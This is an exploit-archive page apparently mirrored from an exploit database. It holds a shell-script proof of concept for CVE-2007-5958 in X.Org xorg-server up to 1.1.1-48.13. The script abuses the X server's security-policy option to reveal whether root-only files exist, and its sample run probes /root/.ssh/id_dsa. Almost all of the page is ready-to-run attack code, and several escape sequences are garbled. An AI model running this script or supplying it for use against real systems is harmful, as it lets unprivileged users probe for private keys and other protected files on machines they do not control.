X.Org xorg-server <= 1.1.1-48.13 Probe for Files Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : X.Org xorg-server <= 1.1.1-48.13 Probe for Files Exploit PoC
# Published : 2008-02-19
# Author : vl4dZ
# Previous Title : MyServer 0.8.11 (204 No Content) error Remote Denial of Service Exploit
# Next Title : DESlock+ <= 3.2.6 DLMFENC.sys Local Kernel ring0 link list zero PoC

#!/bin/sh
# Xorg file disclosure vulnerability (CVE-2007-5958)
#
# Lame xploit by vl4dZ :))
#
# sh-3.1$ whoami
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# sh-3.1$ ./Xorg-File-Existence-PoC.sh /root/.ssh/id_dsa
# ...
# *** FILE /root/.ssh/id_dsa EXIST !! ***

# Vulnerable: xorg-server <= 1.1.1-48.13

X_EXEC=/usr/bin/X
TMP_FILE=/tmp/X.$$

if [ "$1" = "" ]; then
   echo "usage: $0 <file>"
   exit 1
fi

[ -f ${X_EXEC} ] || (echo "${X_EXEC} not found"; exit 1)

echo -e "n** Xorg file disclosure vulnerability PoC (CVE-2007-5958) **n"
echo "A second X server is going to be started, once started, type the "
echo "ctrl+Alt+Backspace sequence and you'll see the result of your request."
echo -en "nType [Enter] to start: "; read

LANG=c ${X_EXEC} :1 -ac -sp $1 2> ${TMP_FILE}

grep "error opening security policy file" ${TMP_FILE} >/dev/null
if [ $? != 0 ]; then
   echo "*** FILE $1 EXIST !! ***"
else
   echo "*** FILE $1 DOES NOT EXIST !! ***"
fi
rm -f ${TMP_FILE}

echo -e "nCtrl-C to quit."
sleep 500

# www.Syue.com [2008-02-19]